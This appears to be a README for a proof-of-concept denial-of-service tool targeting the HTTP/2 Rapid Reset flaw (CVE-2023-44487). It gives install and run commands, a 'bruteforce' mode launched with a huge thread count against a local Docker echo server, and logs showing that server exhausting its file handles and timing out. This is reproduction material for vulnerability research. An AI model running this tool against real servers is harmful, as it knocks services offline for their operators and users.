# HTTP/2 Rapid Reset: CVE-2023-44487

## Description

This folder contains a PoC based on the work done by `imabee101` in `https://github.com/imabee101/CVE-2023-44487` for the HTTP/2 Rapid Reset vulnerability identified as CVE-2023-44487.

At this moment this reproducer will work only through Https.

## Vulnerability Overview

- **CVE ID**: CVE-2023-44487
- **Impact**: Denial of Service (DoS)
- **Affected Protocols**: HTTP/2
- **Affected Components**: Web servers, Reverse Proxies, Load Balancers
- **Disclosure Date**: 2023-10-10

## Getting Started

### Prerequisites

- Python 3.x
- `hyper` 

Install prerequisites:

```bash
pip install hyper
```

### Usage

1. Clone the repository:

```bash
git clone https://github.com/oscerd/nice-cve-poc.git
```

2. Navigate into the directory:

```bash
cd CVE-2023-44487
```

3. Execute the PoC:

```bash
python main.py --url <target_url> --port <target_port> --threads <number of threads> --mode <probe or bruteforce>
```
as target you can run `https://github.com/GoogleChromeLabs/simplehttp2server` as target server for example.

In Probe mode you'll just a gest a response to reset stream, while with bruteforce you'll try to open stream and reset them in multiple threads.

Another possible docker image to use is:

```bash
docker run --rm -p 8001-8010:8001-8010 kalmhq/echoserver:latest
```

from the following repository: https://github.com/kalmhq/echoserver

When you run it you'll get multiple protocols running as stated in the README: Run different protocols on multiple ports to test the protocol forwarding in istio.

By using the https one you can try to run:

```bash
$ curl --insecure --http2 -I https://0.0.0.0:8003
HTTP/2 200 
content-type: text/plain; charset=utf-8
content-length: 431
date: Fri, 13 Oct 2023 11:15:44 GMT
```

and in the log of the server you'll find the request logged.

So you can now try to run

```bash
python3 main.py --url 0.0.0.0 --port 8003 --threads 1000000000 --mode bruteforce
```

The server will log requests continuously until it won't be able anymore:

```bash
2023/10/13 11:18:19 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 80ms
2023/10/13 11:18:19 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 160ms
2023/10/13 11:18:20 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 320ms
2023/10/13 11:18:20 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 640ms
2023/10/13 11:18:21 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 1s
2023/10/13 11:18:22 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 1s
2023/10/13 11:18:23 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 1s
2023/10/13 11:18:24 http: Accept error: accept tcp [::]:8003: accept4: too many open files; retrying in 1s
```

you can test the situation by running curl again:

```bash
curl --insecure --http2 -m 10 -I https://0.0.0.0:8003
curl: (28) Connection timed out after 10001 milliseconds
```

## References

- [Official CVE Record](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-44487)
- [Vendor Advisory](https://github.com/caddyserver/caddy/issues/5877)
- [Other Related Research](https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/)

